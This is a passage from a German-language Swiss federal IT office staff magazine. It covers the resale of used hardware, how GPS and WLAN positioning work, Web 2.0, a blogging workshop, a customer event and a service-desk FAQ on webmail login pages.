12 Produkte & Projekte 12 Hardware-Recycling IT-Altmaterial verkauft sich gut Das BIT lässt nicht mehr benötigte Hardware über den Onlineshop «Auctionline» einer Zweitnutzung zukommen. Davon können alle Mitarbeitenden der BIT-Kunden und des BIT profitieren. Jetzt wurde das Angebot sogar noch ausgebaut. BIT-Kontakt: Stefan Zweili, Bereichsleiter Delivery Center Text: Ernst Schlumpf Die bisherigen IT-Altmaterial-Verkäufe des BIT im Online-Shop waren ein voller Erfolg: Die Anfang Jahr in punktuellen Aktionen angebotenen PCs, Notebooks, Bildschirme usw. gingen weg wie warme Semmeln. «Viele Computer-Nutzer sind nicht mehr bereit, die rasante und teure technische Entwicklung mitzumachen. Denn für viele Anwendungen genügen Geräte der letzten Generation vollkommen aus», sagt dazu Michel Sautter, Geschäftsführer der Swiss Remarketing AG. Seit Anfang Jahr arbeitet das BIT mit der auf den Vertrieb gebrauchter Computer-Hardware spezialisierten Unternehmung im aargauischen Dottikon zusammen. Aufgrund des grossen Erfolgs hat das BIT das ökologisch sinnvolle Hardware-Recycling nun ausgebaut. Neu werden sämtliche Geräte, für die das BIT, bzw. die BIT-Kunden keine Verwendung mehr haben, laufend der Aufbereitung und dem Verkauf durch Swiss Remarketing zugeführt. Das Delivery Center des BIT nimmt gerne Meldungen über weitere grössere Mengen Alt-Hardware entgegen, um sie ebenfalls auf diesem Weg einer Weiterverwendung zuzuführen. Somit gibt es fortan keine punktuellen Verkaufsaktionen mehr, sondern es sollte im Online-Shop immer ein genügend grosses Angebot an Secondhand- Hardware vorhanden sein, die vom Bundespersonal zu Vorzugskonditionen (und mit einer 30-tägigen Laufzeitgarantie) erworben werden kann. Aufbereitung und Reinigung Bevor die Geräte im Online-Shop in den Verkauf kommen, bereiten die Fachleute von Swiss Remarketing sie professionell auf. Im gesicherten Wiederaufbereitungscenter werden die vorhandenen Daten auf den Datenträgern mit sehr rigiden Sicherheitsstandards gelöscht. «Somit kann man später unmöglich nachvollziehen, wo das IT-Equipment ursprünglich im Einsatz stand und wer damit gearbeitet hat», sagt Michel Sautter. Das ist auch der Grund, warum es kein Vorrecht auf ein ganz bestimmtes Gerät, beispielsweise den eigenen, ausgemusterten Arbeits-PC, gibt. Die aufbereiteten PCs erhalten das Betriebssystem frisch installiert, Tastaturen und Mäuse werden in Behindertenwerkstätten oder Strafanstalten penibel gereinigt. Defekte und technisch überholte Hardware wird der fachgerechten Entsorgung zugeführt. Zugang nur mit Passwort Der Online-Shop von Swiss Remarketing hat zwei Bereiche: Einen passwortgeschützten für Firmen («PRO-Bereich») und einen öffentlich zugänglichen Bereich. Die Geräte des BIT werden zuerst im Firmen-Shop angeboten und was übrig bleibt nach einer gewissen Zeit in den öffentlichen Bereich transferiert. Auf den BIT-Firmen- Shop können nur Mitarbeitende der BIT-Kunden und des BIT zugreifen. Wer sich also eines der Occasions-Schnäppchen sichern will, holt sich auf dem BIT-Intranet das aktuell gültige Passwort und loggt sich damit auf im «PRO-Bereich» ein. S het solang s het! Benutzername und Passwort für den Login finden Sie im Intranet BIT unter «Aktuell»: Français Le matériel informatique usagé se vend bien L OFIT vend du matériel usagé par l intermédiaire du magasin en ligne «Auctionline». Tous les clients et les collaborateurs de l OFIT peuvent profiter de cette offre qui a encore été développée dernièrement. Vous trouverez la version française de cet article sous

13 Eingeschoben 13 GPS und Co. Orientierung total «Bei der nächsten Abzweigung links abbiegen», weist uns eine mechanisch freundliche Stimme aus dem Lautsprecher den Weg. Doch wie weiss ein GPS-Navigationsgerät, wo es sich befindet und welchen Weg der Automobilist einschlagen muss? Text: Marc Bärtschi Das Global Positioning System, kurz GPS, ist wohl das bekannteste Positionsbestimmungssystem. Dieses besteht aus rund 30 Satelliten, die in Metern Höhe ein Signal aussenden, mit dessen Hilfe ein GPS-Empfangsgerät seine aktuelle Position auf der Erdoberfläche ermitteln kann. Ausgerüstet mit einem entsprechenden Empfänger, steht GPS allen Menschen weltweit, zu jeder Zeit und kostenlos zur Verfügung. Und da die GPS-Geräte inzwischen erschwinglich geworden sind, erfreuen sie sich immer grösserer Beliebtheit. Zudem sind GPS-Empfänger nicht mehr nur etwas für Fachleute und Technik- Begeisterte. Auch im Alltag sind mehr und mehr Anwendungen möglich. Von einfachen Orientierungshilfen über Navigationssysteme für das Auto geht das Angebot heute bis hin zu Trainingsunterstützungen für Sport Treibende. Wie funktioniert GPS? Das Prinzip basiert, vereinfacht gesagt, auf demjenigen um die Entfernung eines Gewitters abzuschätzen: Man vergleicht die Zeitdifferenz zwischen Blitzschlag und Wahrnehmung des Donnergrollens. GPS funktioniert ähnlich: Um die exakte Positionsbestimmung zu ermöglichen, sendet jeder GPS-Satellit fortlaufend ein Signal, das seine Position sowie den Zeitpunkt des Signalversandes angibt. Um Folgeberechnungen zu erleichtern, sendet jeder Satellit zusätzlich noch Informationen über seine Umlaufbahn. Das Empfangsgerät bestimmt nun seine Position, indem es den Zeitpunkt der Signalabgabe mit demjenigen des Signalempfangs vergleicht. Aus der Zeitdifferenz errechnet sich die Distanz zum Satelliten. 3D-Positionsbestimmung mit 4 Satelliten: Anhand der Zeitdauer, mit der ein Satelliten-Signal bis zum GPS-Empfangsgerät unterwegs ist, errechnet dieses seine Distanz zu den einzelnen Satelliten und damit seine Position im Raum. Zur eindeutigen, dreidimensionalen Positionsbestimmung benötigt das Empfangsgerät das Signal von mindestens vier Satelliten. Zu diesen sollte möglichst eine uneingeschränkte «Sicht» herrschen, dann ist eine Genauigkeit bis auf wenige Meter möglich. Das Empfangsgerät Français L orientation sans faille Une voix synthétique, agréable, nous indique la direction à suivre: «Au prochain carrefour, tournez à gauche». Mais comment un système de navigation peut-il savoir où il se trouve et quelle direction doit prendre l automobiliste? C est possible grâce au GPS et à des systèmes analogues. Vous trouverez la version française de cet article sous

14 Eingeschoben 14 berechnet aus den GPS-Signalen die Koordinaten seines aktuellen Standorts. Wenn in diesem kartografische Informationen hinterlegt sind, ist zudem eine visuelle Standortinformation auf einer Landkarte oder einem Stadtplan möglich. Ständige Neuberechnung der Position erlaubt darüber hinaus die Ermittlung der Bewegungsrichtung und der Geschwindigkeit. Ortung via Mobiltelefon: Pseudo-GPS Grundsätzlich ist die Positionsbestimmung auch mit einem Mobiltelefon möglich. Jeder Mobilfunkanbieter ist in der Lage, über die Funkzelle, in der sich das (eingeschaltete) Telefon befindet, seinen aktuellen Standort zu ermitteln. Diese Methode ist jedoch sehr ungenau. Je nach Dichte der Funktürme ist die Standortbestimmung von hundert Metern bis auf mehrere Kilometer genau. Seit GPS auch in den Mobiltelefonen Einzug gehalten hat, ist die Ortung derselben um ein Vielfaches exakter geworden. Normalerweise lässt sich ein GPS-Empfänger nicht orten, da diese Geräte nur passiv arbeiten. Für eine Überwachung via GPS benötigt man zusätzlich einen aktiven Sender, der die ermittelten Positionsdaten weitergibt. Im Beispiel des Mobiltelefons können diese Infos per SMS an einen Dritten gesendet werden. Bereits bieten einige Mobilfunkunternehmen ihren Kunden Ortungsservices an. So können verloren gegangene Telefone oder verlaufene Kinder wieder gefunden werden. Die User müssen allerdings der Herausgabe der Position des Mobiltelefons zustimmen. Ansonsten darf ein Mobilfunkunternehmen keinerlei Daten dieser Art an Dritte weitergeben. WLAN als GPS-Konkurrenz? In den USA ist unlängst ein weiteres Positionsbestimmungssystem eingeführt worden, das sich anhand von Funknetzwerken (WLAN) orientiert. Das funktioniert so: Jeder WLAN-Hotspot sendet ununterbrochen ein Signal aus, dessen Stärke sich messen lässt. Je weiter weg sich der Hotspot befindet, umso schwächer ist das Signal. Auf diese Weise lässt sich die Distanz des Messgerätes zum WLAN-Sender ermitteln. Wenn sich nun mehrere solcher Sender in der Umgebung befinden und die Position dieser bekannt ist, lässt sich daraus die eigene Position berechnen. Da Funknetzwerke mittlerweile auch in Privathaushalten weit verbreitet sind, ist die Positionsbestimmung mittels dieses neuen WPS (WLAN Positioning System) zumindest in Ballungsräumen praktisch flächendeckend möglich. Das Problem ist, dass die Standorte all der existierenden WLAN-Hotspots grundsätzlich nicht bekannt sind. Deshalb ist vor der Einführung erst eine aufwändige «Kartografierung» der bestehenden Hotspots erforderlich, welche in regelmässigen Abständen aktualisiert werden muss. Die Genauigkeit bewegt sich auch hier je nach Dichte der WLAN-Sender um die 20 Meter herum. Im Gegensatz zu GPS ist die Positionsbestimmung mit WPS aber auch in Innenräumen möglich. Wann WPS auch in Europa nutzbar wird, ist noch nicht bekannt. Die Kartografierung der europäischen Metropolen ist aber bereits im Gang. GPS: Geschichtlicher Hintergrund Realisiert wurde GPS vom amerikanischen Verteidigungsministerium und diente ursprünglich rein militärischen Zwecken. Vollumfänglich in Betrieb genommen wurde es Der zivilen Bevölkerung wurde die volle Funktionsbereitschaft von GPS erst im Jahr 2000 mit dem Abschalten der künstlichen Ungenauigkeit (Selective Availability) zur Verfügung gestellt. Lag die Genauigkeit von Positionsbestimmungen mit Selective Availability bei rund 100 Metern, so liegt sie heute bei ca. 15 Metern. Um ein präzises Zeitsignal zu liefern, sind die GPS-Satelliten mit Atomuhren ausgestattet. Neben dem militärischen Zweck kommt GPS heutzutage vorrangig in der Luft-, Land- und Seefahrtnavigation, aber auch bei Landvermessungen und anderen Anwendungen zum Einsatz, bei denen es auf die genaue Positionsbestimmung ankommt. Alternativ zu GPS sind momentan mehrere Länder parallel mit eigenen Entwicklungen satellitengestützter Systeme beschäftigt. Die meisten (z.b. Galileo, MTSAT) befinden sich allerdings noch in der Experimentierphase.

15 Eingeschoben 15 Web 2.0 Eine vernetzte Geschichte Die Entwicklungsgeschichte des Homo sapiens sapiens besser bekannt als der Mensch verläuft irgendwie analog zu jener der Computer oder umgekehrt. In der Biologie nennt man das Ko-Evolution. Hier lesen Sie, wie sich das zugetragen hat ausgeschmückt mit deutschen und englischen IT-Begriffen. Text: Ernst Schlumpf Früher, als wir endlich von den Bäumen heruntergekommen waren, da war wirklich alles ganz anders: Da sass einer vor seiner Höhle mit dem riesigen Screen Natur vor den Augen und er überlegte, wie er sich wohl am besten vernetzen könnte, um beim Jagen und Sammeln Erfolg zu haben. Er war eine Frühform des Networkers. Er realisierte recht schnell, dass er sich mit seinen Mitmenschen verständigen musste, erfand ein paar Urlaute und schliesslich eine Sprache, eine Vorform einer description language, die genau bezeichnete, was gemeint war. Er realisierte, dass er in der Horde mehr Erfolg hatte und raufte sich mit seinen Kollegen zusammen, betrieb also eine Art Social Networking. Die Horde gab den Erfolgs-Orten Namen. Das war aktives Tagging, eine begriffliche und inhaltliche Verschlagwortung. Weil alles immer wieder vegessen ging, begann die Gruppe, die ersten Fonts zu entwickeln, Schriftzeichen und Schriften, und diese in steinernen Wordtafeln festzuhalten. Die waren allerdings zu schwer und da es zudem immer mehr mitzuteilen Die Schwerpunkte: Die Web-Evolution Web 2.0: Eine Linkliste im Intranet Nun sind Sie gefragt teilen Sie (uns) Ihr Wissen (mit): gab, erfand einer das Papier (Paper, Document). Da immer mehr Leute an diesen Doku- menten teilhaben wollten, kam ein weiterer Schlauer auf die Idee, diese Dokumente zu kopieren (copy) und zu vervielfältigten (paste). Sie wurden in Buchdeckel gepackt und in Bibliotheken (archives) eine Art data bases gestellt. Unser Höhlenbewohner war in der Urform einer zivilisierten Gesellschaft angekommen, denn davon spricht man normalerweise, wenn gewisse Skills beherrscht werden, die das Jagen und Sammeln übersteigen. Mittlerweile waren eineinhalb Millionen Jahre oder so vergangen und ab jetzt ging alles sehr sehr schnell. Der Homo sapiens sapiens wurde industrialisiert, informatisiert und instrumentalisiert und er bekam Zeitungen, Post, Telefonie, Fotografie, Radio, TV und ähnlich banale, mediale Mittel. Das führte dazu, dass er bewusster wurde und auch immer mehr wusste und die konventionellen Mittel wie Briefe usw. nicht mehr ausreichten, um dies zu verbreiten. Nun kam wieder einer und fand einen computergestützten Weg, dies zu tun. Er schrieb einen Dialekt (description language) namens HTML und via Protokoll (TCP/ IP) konnten nun beliebig viele Files von einem Jäger und Sammler zum anderen verschoben werden. Das Internet (interconnected networks) war entstanden. Davon gab es im Dienst World Wide Web (WWW) eine Version 1.0. Die Version Web 1.0 mit HTML war eine Ansammlung statischer Websites, die sich via Hyperlink ansteuern liessen, aber auch ein Datenmedium. Als Web 2.0 mit XML ist es ein dynamisches Informations-, Dialog- und Partizipationsmedium (Wiki) und als Web 3.0 mit OWL (Web Ontology Language) könnte es ein konnektives Wissensmedium (Semantic Web) werden. Optimisten meinen, dies sei dann die Wissensgesellschaft. Sie träumen von der globalen Adaption des verfügbaren Wissens (Wisdom of Crowds). Pessimisten meinen, dies sei die beginnende virtuelle Gesellschaft (Virtual Society). Das meint nichts mehr und nichts weniger, als dass diese virtuelle Art der Gesellschaft nicht wirklich da ist, und nur so tut, wie wenn sie es wäre. Wie aber ist die heutige Lage zu beurteilen? Nun, wir sind weder in der Zukunft noch in der Gegenwart, wir sind einfach in einer Realität. Nicht in der Virtual Reality, sondern in der reellen, tatsächlich Seienden. Da drinnen ist wirklich alles gleich wie früher. Wir sitzen vor unserem kleinen Screen und suchen nach globalen Spuren und Netzwerken. Etwas ganz Entscheidendes ist dennoch bereits geschehen: Das früher als Web 2.0 häufig herbeizitierte Semantic Web ist zwar

16 Eingeschoben 16 bis heute nicht angekommen. Im Hintergrund hat sich aber, quasi als dessen Abfallprodukt, eine alternative 2.0-Variante etabliert: Das Mitmachweb, welches so heisst, weil es User generated, interaktiv, partizipativ und intermedial ist. Dieses Web 2.0 ist nach seinem Guru Tim O Reilly eigentlich ein Marketingmodell (network marketing), eine Plattform auch, auf der kollektive Intelligenz genutzt wird. Die Datenaufbereitung ist zentral, Softwarelebenszyklen sind durch neue Programmiermodelle ersetzt, mobile Geräte sind integriert und der Desktop ist Webtop. Die Mitwirkung der Nutzer und Nutzerinnen ist die entscheidende Komponente: Sie entwickeln die Basistechnologien (Ajax, Content Syndication, offene APIs). Anwendungen und Funktionen werden von allen für alle zur Verfügung gestellt (Open Source und Free Software). wird. Es könnte aber das Semantic Web in einer bereits intelligenten Version sein, die gelernt hat, Daten logisch zu verknüpfen und zu verarbeiten und eine intelligente Umgebung zu schaffen (Ambient Intelligence, verwandt mit Ubiquitous Computing). In Web 4.0 schliesslich werden intelligente Applikationen den Usern und Userinnen selbständig weiterhelfen. Und so weiter. Tauchen wir ein und lassen wir uns überraschen. Wir begnügen uns an dieser Stelle vorerst einmal mit einer kleinen, aber feinen Auswahl an Web 2.0-Links, welche Sie im BIT-Intranet unter finden. Bitte teilen Sie uns Ihre eigenen favorisierten Links mit, damit wir sie publizieren können: Die Global markets sind vernetzt. Immer mehr Provider tummeln sich im Netz, sie beziehen Clients und Customers in ihre Services mit ein. Die Kunden und Kundinnen nehmen die Challenges an und teilen (share) ihr Know-how gegenseitig und nutzen es (Social Shopping). Sie treten in einer Zwitter-Rolle als Consumer und Producer gleich Prosumer auf und bieten ihre Products und ihr Know-how immer öfter in den Online-Shops der entsprechenden Labels / Brands an. Auf diese Weise entstehen neue Services und Märkte. Markt, Angebot, Nachfrage und Verhalten werden sehr direkt und entscheidend beeinflusst und verändert. Positive Interpreten sichten darin einen grossen Input an Kreativität bis hin zu «neuen Formen der Ich-Bildung» (der Trendforscher Andreas Haderlein). Kritiker wie der Internet-Unternehmer Andrew Keen sehen im Web 2.0 jedoch den Feind aller Kreativität und fürchten um das Individuum. Freuen wir uns also auf das Web 3.0! Es ist noch nicht ganz klar, was das denn sein soll/

17 Events 17 Berner PR-Gesellschaft PR-Leute bloggen im BIT Blogs sind in aller Munde. Doch handelt es sich dabei bloss um eine Modeerscheinung, oder ist Bloggen heute ein unverzichtbarer Bestandteil der Unternehmenskommunikation? Ende Mai lud die Berner PR-Gesellschaft zu einem spannenden Workshop ins BIT, um dieser Frage auf den Grund zu gehen. BIT-Kontakt: Nora Kelemen, Bereichsleiterin Kundenkommunikation Text: Leo Hauser Foto: Marc Bärtschi Der Anlass unter dem Titel «Blogs... Modeerscheinung oder unverzichtbar?» fiel mit dem ersten richtigen Sommertag des Jahres 2008 zusammen. Doch trotz 30 Grad im Schatten strömten am frühen Abend des 27. Mai fast 90 geladene Teilnehmerinnen und Teilnehmer aus Privatwirtschaft und Bundesveraltung ins BIT-Hauptgebäude, die «Titanic II». Gerufen hatte die Berner Public Relations Gesellschaft (BPRG), die für ihre Mitglieder (zu denen auch das BIT gehört) regelmässig Events zu verschiedensten Themen und an wechselnden Orten organisiert. Bloggen als Lebensstil Nach einer kurzen Vorstellung des BIT durch Mediensprecher Claudio Frigerio gestaltete der Berner Journalist und Blogger Mathias Born (borniert.com; webflaneur.espace.ch) den Auftakt zum Blog-Anlass im BIT. In seinem erfrischenden Referat gewährte Born einen spannenden Einblick in die Blogosphäre. Ein Blog, so definierte er in Anlehnung an die Wikipedia, sei ein auf einer Website geführtes, öffentliches Tagebuch, häufig endlos, das heisst, aus einer langen chronologisch sortierten Liste von Einträgen bestehend. «Bloggen ist ein Lebensstil», proklamierte Mathias Born. Blogger seien besondere Menschen, eben Menschen, die stets nach Speziellem Ausschau halten, über das man bloggen könnte. Born wies aber darauf hin, dass der Schuss auch nach hinten losgehen könne, wie zum Beispiel bei jenem US-Präsidentschaftskandidaten, der sich 2003 nach allzu emotionalen Statements in seinem Blog zum Gespött machte und seine Kandidatur schliesslich zurückzog. Im Nu zum eigenen Blog Muss man Blogs wirklich lesen? Belanglose Inhalte, in der Szene liebevoll «Katzen-Content» genannt, gibt es in den Blogs en masse. Doch Beispiele dafür, dass einzelne Blogger mittlerweile ernstzunehmende Meinungsführer im Internet sind, wurden am BPRG-Anlass einige genannt. Und als Meinungsführer werden Blogger natürlich auch für PR-Fachleute interessant. Denn Blogger sind stark untereinander vernetzt. Suchmaschinen stufen Blogs hoch ein. Und Blogger können mit spezifischen Inhalten Themen setzen, popularisieren und einen Diskurs über diese Themen fördern. In drei Workshops lernten die Teilnehmenden des BPRG-Anlasses im BIT, wie man selbst Blogger wird und was einen guten Blogger ausmacht. Unter Anleitung von Caner Aslan (Microsoft Schweiz) richteten die PR-Leute in Minutenschnelle einen Blog ein und posteten ihren ersten Beitrag. Stefan Meierhans (ebenfalls Microsoft Schweiz) sprach über Blog-Konzepte und zeigte am Beispiel eines US-Blogs über Hybridautos, wie sich aus einzelnen kritischen Blogbeiträgen nach und nach eine grosse Medienstory Klarsicht in der Blogosphäre dank Blogger Matthias Born spinnen kann. Wie wichtig darum für Firmen ein systematisches Blog-Monitoring ist, zeigte der dritte Workshop, wiederum mit Mathias Born. Bei einem feinen Apéro klang der gelungene Event schliesslich aus.

18 Events 18 Kundenanlass des BIT «BIT in Action»: Infos aus erster Hand Um vier spannende Themen kreiste die 7. Ausgabe des BIT- Kundenevents «BIT in Action» vom 13. Juni Rund 100 Personen aus dem Kundenkreis des BIT folgten der Einladung in die Aula des Eidgenössischen Personalamtes. BIT-Kontakt: Jean-Pierre Beuret Account Manager admin.ch Text und Foto: Leo Hauser Zwei Prozent der weltweiten CO 2 -Emissionen gehen auf das Konto der IT. Das klingt zunächst nicht nach viel, entspricht aber dem Ausstoss aller Flugzeuge der Welt. Insofern wundert es nicht, dass die Energie- und Klimadiskussion längstens auch in der IT-Branche geführt wird. Die verschiedenen Lösungsansätze gruppieren sich unter dem Schlagwort Green IT. Zu diesem herausfordernden Thema sprachen am «BIT in Action» die Gastreferenten Markus Maag und Christoph Wittlinger von Fujitsu-Siemens. Der Vortrag verschaffte einen Überblick über den Label-Dschungel und die Referenten zeigten einen Server-Rechner, der im Betrieb 40% weniger Strom verbraucht. Auch ein Monitor, der im Standby-Modus keine Energie mehr verbraucht und der im Betrieb seine Helligkeit automatisch den Lichtverhältnissen anpasst, wurde vorgestellt. Schliesslich war zu erfahren, dass auch eine gute Hardware-Qualität für einen tieferen CO 2 -Ausstoss sorgt, weil das Auto der Servicetechniker öfter in der Garage stehen bleiben kann. Die Zukunft der Bundes-Telefonie Neben dem Gastreferat bildeten natürlich die BIT-Topics den thematischen Hauptharst des Kundenanlasses «BIT in Action». Im ersten Vortrag zu spezifischen BIT-Themen erfuhren die rund 100 Teilnehmenden Wissenswertes über das Projekt «Neue Telefonie Bundesverwaltung», welches von Levent Atak, Produktmanager Telekommunikation, und Kurt Schütz, Projektleiter Telekommunikation, vorgestellt wurde. Blickt man auf die heutige Situation, zeigt sich, dass noch immer ein Drittel der Telefonie-Endgeräte auf analoger Technologie basiert. Ins Auge sticht auch die grosse Anzahl Telefonanlagen praktisch jedes Bundesgebäude verfügt über eine eigene Anlage. «Dies bringt hohe Betriebs- und Wartungskosten mit sich», betonte Kurt Schütz. «Darum soll das Projekt Neue Telefonie die Grundlage für eine bessere Skalierung liefern, woraus eine Reduktion der Anlagenzahl resultieren wird.» Weitere Stichworte für die Telefoniezukunft in der Bundesverwaltung sind sicherlich Voice over IP (VoIP) und Computer Telephony Integration (CTI), also computergestütztes Telefonieren. Ziel ist hier die Integration der Sprachdienste in die Büroautomation. Die Mitarbeitenden werden Telefonate via PC steuern können. Kurt Schütz: «Künftig klickt man in irgendeinem Dokument oder in den Outlook-Kontakten eine Telefonnummer an und die Telefonverbindung wird automatisch aufgebaut.» Weitere Fixpunkte sind «One Phone» (ein Gerät, das Festnetzgerät und Handy vereinigt), bzw. «One Number» (eine einzige Nummer für verschiedene Arbeitsorte). Die heutige Telefoninfrastruktur glänzt durch eine Verfügbarkeit von 99,999 Prozent. Diese hohe Stabilität soll natürlich auch in Zukunft beibehalten werden. Darum baut das Projekt «Neue Telefonie» auf einem evolutionären Vorgehen, auf einer so genannten Soft Migration. Das Telefonie-Projekt des BIT befindet sich heute in der Konzeptphase. Formular-Service spart Zeit Der Formular-Service des BIT war der nächste Punkt auf der Themenliste des «BIT in Action». Alain Barras, Entwicklungsverantwortlicher des CC Internet, legte die Argumente dar, die für elektronische Formulare sprechen und zeigte den Einsatz an einem praktischen Beispiel auf. Dass elektronische Formulare mithelfen, Papier einzusparen (Stichwort Green IT!), liegt auf der Hand. Doch ermöglichen die E-Formulare auch viele Funktionen, die kein Papierformular bietet. So können verschiedene Formulare miteinander vernetzt und gruppiert, und natürlich die Bearbeitung der Eingaben automatisiert werden. Die rationelle und zentralisierte Verarbeitung erlaubt eine beachtliche Zeitersparnis und erhöht nicht zuletzt auch die Datensicherheit. Das beim Formular-Service des BIT zum Einsatz kommende Produkt ist Jaxforms der Zürcher Firma xcentric. «Jaxforms ist browserbasiert, man braucht dafür also keinerlei zusätzliche Software zu installieren», erklärte Alain Barras. Zu den weiteren Pluspunkten gehört die Möglichkeit, individuelle Regeln für die Plausibilität von Formulareingaben zu definieren, zum Beispiel die automatische Prüfung der Schreibweise einer -Adresse. An einem Prototyp für das Bundesamt für Landwirtschaft demonstrierte Alain Barras den praktischen Einsatz des Formular-

19 Events 19 Services. So auch die Möglichkeit, ein angefangenes Formular gesichert durch ein Passwort online zwischenzuspeichern und zu einem späteren Zeitpunkt zu vervollständigen. Ebenso kann der Benutzer bei Bedarf eine PDF-Quittung des ausgefüllten Formulars ausgestellt bekommen, etwa wenn seine eigenhändige Unterschrift auf dem Formular erforderlich ist. E-Gov-Services in der SOA Der Formular-Service ist einer der Bausteine der service-orientierten Architektur (SOA). Die SOA dreht sich in der Bundesverwaltung vor allem um die Realisierung von modularen E-Government- Services. Über die SOA Basis Services verschaffte Bereichsleiter Fernand Hänggi in seinem Referat im Rahmen des «BIT in Action» einen Überblick. Der neu gegründete Bereich SOA Basis ist in der Abteilung E-Government im Lösungszentrum des BIT angesiedelt. «Unser Bereich stellt die Schnittstelle zwischen IT-Architektur, den Entwicklern der Services sowie dem Betriebszentrum sicher», erklärte Fernand Hänggi. Wichtige Grundlage einiger angebotener Services ist die OSCI-Infrastruktur (OSCI = Online Services Computer Interface), die den sicheren, robusten und nicht abstreitbaren Datenaustausch unterstützt. Diese Infrastruktur eignet sich auch für grosse Datenmengen und wird beispielsweise für die Volkszählung 2010 eingesetzt. Die Services im Einzelnen umfassen heute, neben dem Formular-Service, den Adressverifikations- Service zur Überprüfung von Postadressen (verfügbar als Web-Service), den E-Payment-Service für die Bezahlung per Kreditkarte, den Protokollierungs-Service für das zentrale Logging von Informationen in einer Datenbank und den Publish/Subscribe-Service zur Verwaltung von Verteilerlisten. Weitere Services in der SOA beinhalten das Access und Identity Management sowie das Service-Portal zur Verwaltung von implementierten Services (derzeit in der Pilotphase). Den Abschluss des «BIT in Action» bildete wie immer ein Stehlunch, Gelegenheit sich über das Gehörte und Gesehene auszutauschen. Tipp. Den kompletten Foliensatz des «BIT in Action» finden Sie im Intranet BIT (intranet.bit. admin.ch) unter «Aktuell» > «Veranstaltungen». Die Referenten des 7. «BIT in Action» (von hinten links): Markus Maag, Daniel Feldmann (beide Fujitsu-Siemens), Kurt Schütz (Projektleiter Telekommunikation), Levent Atak (Produktmanager Telekommunikation), Alain Barras (Informationssystem-Architekt CC Internet), Christoph Wittlinger (Fujitsu- Siemens), Jean-Pierre Beuret (Account Manager BIT), Fernand Hänggi (Bereichsleiter SOA Basis), René Sprecher (Bereichsleiter Account Management), Romi Meyer (Leiterin Abteilung Kunden)

20 BITS & Bytes 20 FAQ Die komplexe Welt der (Bundes-)IT wirft im Alltag der Userinnen und User immer wieder Fragen auf. In jedem «Eisbrecher» beantwortet der Service Desk BIT einige dieser «frequently asked questions» (FAQ). Wo finde ich das Benutzerhandbuch zu Outlook Web Access? Dank Outlook Web Access (OWA) haben Sie von zu Hause oder von unterwegs Zugriff auf Ihre geschäftliche Mailbox. Die Bedienung von OWA ist keine Hexerei. Trotzdem ist es wissenswert, wie sich OWA und Outlook im Funktionsumfang unterscheiden. Auch die besonderen Sicherheitshinweise für OWA sollte man sich regelmässig in Erinnerung rufen. Alle diese Informationen finden Sie im kompakten Benutzerhandbuch. Dieses liegt im Intranet BIT auf Deutsch und Französisch vor: > Angebote > Büroautomation > Outlook Web Access Global Woran erkenne ich die korrekte Loginmaske für RAS-Dienste des BIT? Grundsätzlich sind die beiden Dienste OWA und Full Network Access (RABA) zu unterscheiden. In beide loggen Sie sich über das RAS-Portal ein, jeweils via eine eigene Zugangsseite: OWA => https://webmail.admin.ch RABA => https://ras.admin.ch/[departement] (Bsp. EFD: https://ras.admin.ch/efd) Welche Login-Maske Sie vor sich haben, sehen Sie auf der Titelleiste des Browserfensters: «OWA Logon» für OWA und «RAS Logon» für RABA. Beim Klick auf mein Webmail-Bookmark erhalte ich die falsche Login-Maske. Geben Sie die Adresse des Webmail-Dienstes ein, werden Sie automatisch auf die Webmail-Login- Maske auf dem RAS-Portal umgeleitet. Wenn Sie jedoch direkt auf diese Seite bookmarken, erhalten Sie beim nächsten Aufruf nicht die gewünschte Login-Maske, denn der Einstieg muss aus technischen Gründen immer über die Webmail-Adresse https://webmail.admin.ch geschehen. Ändern Sie also in den Lesezeichen Ihren Webmail-Bookmark manuell auf diese Adresse. KlJ Kurz notiert Neue Anleitung: Barrierefreies Content-Filling mit Imperia Internetangebote der Bundesverwaltung müssen von Gesetzes wegen barrierefrei gestaltet sein. Barrierefrei bedeutet, dass die Webseiten so gestaltet sind, dass auch Menschen mit Seh- oder Hörbehinderung, motorischer oder kognitiver Behinderung die Inhalte nutzen können, gegebenenfalls mit Hilfsmitteln wie dem Screen-Reader. Auf der technischen Seite erfüllt Imperia, das vom BIT für Kundenwebsites verwendete Content Management System (CMS), diese Anforderung und hat auch im Praxistest bestanden. Ein wirklich barrierefreies Webangebot erhält man aber erst, wenn auch die Inhalte im CMS so eingepflegt werden, dass sie hernach für alle nutzbar sind. So bleibt Sehbehinderten das schönste Foto unerschlossen, wenn der Online-Redaktor beim Content-Filling keine aussagekräftige Text-Alternative miterfasst. In der Bundesverwaltung nehmen nicht weniger als 700 Personen Aufgaben im Bereich Content- Filling mit dem CMS Imperia wahr. An ihnen liegt es, im täglichen Gebrauch des CMS einige wenige, aber umso wichtigere Punkte zu berücksichtigen und damit einen Beitrag zum hürdenfrei zugänglichen Bundes-Web zu leisten. Worauf es beim Content-Filling konkret ankommt, haben die Accessibility-Fachleute des BIT in einem 16-seitigen PDF-Dokument für alle Imperia-Redaktorinnen und -Redaktoren zusammengefasst. Die nützliche Anleitung mit dem Titel «Barrierefreies Content-Filling mit Imperia», die in Zusammenarbeit mit der Stiftung «Zugang für alle» entstanden ist, kann in den Imperia-Kundenauftritten (im Hauptmenü unter «Imperia Information Village») abgerufen werden. Das Dokument steht, nebst vielen weiteren Materialien zum Thema, auch auf dem Accessibility-Portal im BIT-Intranet zur Verfügung: HL Störungsmeldungen Die aktuellen Störungsmeldungen finden Sie jeweils auf der Startseite des Intranet BIT:

Anleitung E-Mail Konfiguration sowie Übersicht Mailprogramm roundcube Inhaltsverzeichnis

Anleitung E-Mail Konfiguration sowie Übersicht Mailprogramm roundcube Inhaltsverzeichnis Anleitung E-Mail Konfiguration sowie Übersicht Mailprogramm roundcube Inhaltsverzeichnis Einführung... 2-3 Servereinstellungen für die Einrichtung auf dem E-Mail Client... 4 E-Mail Adresse / Postfach einrichten...

Mehr

Computeria Kurs vom 27.3.13

Computeria Kurs vom 27.3.13 Computeria Kurs vom 27.3.13 Allgemeines zu Email E- mail = electronic mail = Elektronische Post = eine auf elektronischem Weg in Computernetzwerken übertragene, briefähnliche Nachricht Vorteile von E-

Mehr

IncaMail Vertraulich und nachweisbar e-mailen Erfahrungen und Erkenntnisse. Swiss Post Solutions Präsentationsguide

IncaMail Vertraulich und nachweisbar e-mailen Erfahrungen und Erkenntnisse. Swiss Post Solutions Präsentationsguide IncaMail Vertraulich und nachweisbar e-mailen Erfahrungen und Erkenntnisse Seite 1 SwissSign AG Swiss Post eproducthouse ein Unternehmen der Schweizerischen Post, schützt und beschleunigt Ihre Geschäftsprozesse

Mehr

